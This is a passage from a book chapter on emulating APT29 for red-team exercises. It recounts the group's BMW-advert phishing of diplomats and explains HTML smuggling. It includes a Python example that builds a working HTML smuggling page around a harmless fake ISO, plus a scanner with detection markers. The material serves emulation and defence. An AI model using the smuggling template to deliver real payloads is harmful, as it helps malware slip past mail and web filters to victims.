Chapter 16. APT29 Emulation Plan

This chapter covers emulation of APT29, a Russian state-sponsored group tracked under many aliases, including NOBELIUM, Cloaked Ursa, Cozy Bear, and CozyDuke. Attributed to the Russian government's Foreign Intelligence Service (SVR), the group has run several recent cyberespionage campaigns. Its common targets include the government, diplomatic, think-tank, healthcare, and energy sectors. The group is known for unconventional tradecraft, and it has steadily refined its phishing, using pretexts tailored to the specific email recipients.

For instance, in an operation that began in May 2023, APT29 used a BMW car advertisement to target diplomats in Kyiv, Ukraine (see Figure 16-1).1 The advertisement mimicked a legitimate car sale flyer previously circulated by a Polish diplomat, which lent it credibility. When recipients clicked a link in the malicious document, supposedly to view "more high-quality photos," they were redirected to an HTML page that delivered a malicious ISO file through a technique known as HTML smuggling. In HTML smuggling, the payload is embedded in an HTML attachment or web page as an encoded string (typically base64), and JavaScript running in the browser decodes it and reassembles it into a file on the victim's machine, so the file itself never crosses the network as a download. This helps evade perimeter controls such as mail gateways and web proxies, which see only HTML and script content; the payload exists as an executable file only after the page is rendered in the browser.
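The following is an added example, not code from the book or from APT29's tooling, showing both sides of the technique described above: a builder that produces an HTML smuggling page of the kind an emulation team would use (with a benign, constructed stand-in payload carrying only an ISO 9660 signature, not a real image), and a scanner that pulls the embedded payload back out of an HTML attachment and checks whether it is an ISO. The base64 literal length threshold, the marker strings, and the template layout are assumptions chosen for illustration.

```python
"""HTML smuggling demo: a base64-encoded payload is embedded in an HTML page
and reconstructed client-side by JavaScript (atob -> Blob -> object URL ->
<a download>). build_smuggling_page() produces such a page for a benign
stand-in payload; scan_html() is a simple detector for attachments.
Added example; not code from the book or from any real campaign.
"""
import base64
import re

ISO_PVD_OFFSET = 0x8000  # ISO 9660 primary volume descriptor starts here
ISO_MAGIC = b"CD001"     # standard identifier, preceded by a 1-byte type

# Template of a smuggling page. Braces are doubled where JS needs literal ones.
HTML_TEMPLATE = """<!DOCTYPE html>
<html><body>
<p>Loading more high-quality photos...</p>
<script>
  // The file travels inside the page as text, not as a download.
  var b64 = "{b64}";
  var bin = atob(b64);
  var bytes = new Uint8Array(bin.length);
  for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
  // Reassemble the file in the browser and trigger a local download.
  var blob = new Blob([bytes], {{type: "application/octet-stream"}});
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = "{filename}";
  document.body.appendChild(a);
  a.click();
</script>
</body></html>
"""


def build_smuggling_page(payload: bytes, filename: str) -> str:
    """Return an HTML page that smuggles `payload` as a base64 string."""
    return HTML_TEMPLATE.format(b64=base64.b64encode(payload).decode(),
                                filename=filename)


def make_fake_iso() -> bytes:
    """Constructed stand-in: zero-filled buffer with a valid ISO 9660 PVD signature."""
    buf = bytearray(ISO_PVD_OFFSET + 16)
    buf[ISO_PVD_OFFSET] = 0x01                       # descriptor type: primary
    buf[ISO_PVD_OFFSET + 1:ISO_PVD_OFFSET + 6] = ISO_MAGIC
    return bytes(buf)


def is_iso_image(data: bytes) -> bool:
    """True if the bytes carry the ISO 9660 'CD001' signature at 0x8001."""
    return data[ISO_PVD_OFFSET + 1:ISO_PVD_OFFSET + 6] == ISO_MAGIC


# A quoted base64 literal of at least 64 chars (assumed threshold).
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{64,}={0,2})["\']')
# Browser APIs that together indicate client-side file reassembly (assumed list).
DOWNLOAD_MARKERS = ("atob(", "createObjectURL", ".download", "Blob(")


def scan_html(html: str) -> dict:
    """Decode large base64 literals and look for the download-trigger pattern."""
    markers = [m for m in DOWNLOAD_MARKERS if m in html]
    payloads = []
    for m in B64_LITERAL.finditer(html):
        try:
            data = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        payloads.append({"size": len(data), "is_iso": is_iso_image(data)})
    return {
        "markers": markers,
        "payloads": payloads,
        # Flag when an embedded blob coexists with the reassembly APIs.
        "suspicious": bool(payloads) and len(markers) >= 2,
    }


if __name__ == "__main__":
    page = build_smuggling_page(make_fake_iso(), "photos.iso")
    print(scan_html(page))
```

The scanner deliberately keys on the combination of a large base64 literal and the Blob/object-URL/download APIs rather than on either alone; real pages often split or lightly obfuscate the string, so in practice this is a triage heuristic to run alongside sandbox detonation, not a signature.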

Figure 16-1. APT29’s phishing featuring a BMW ad, crafted to lure targets ...
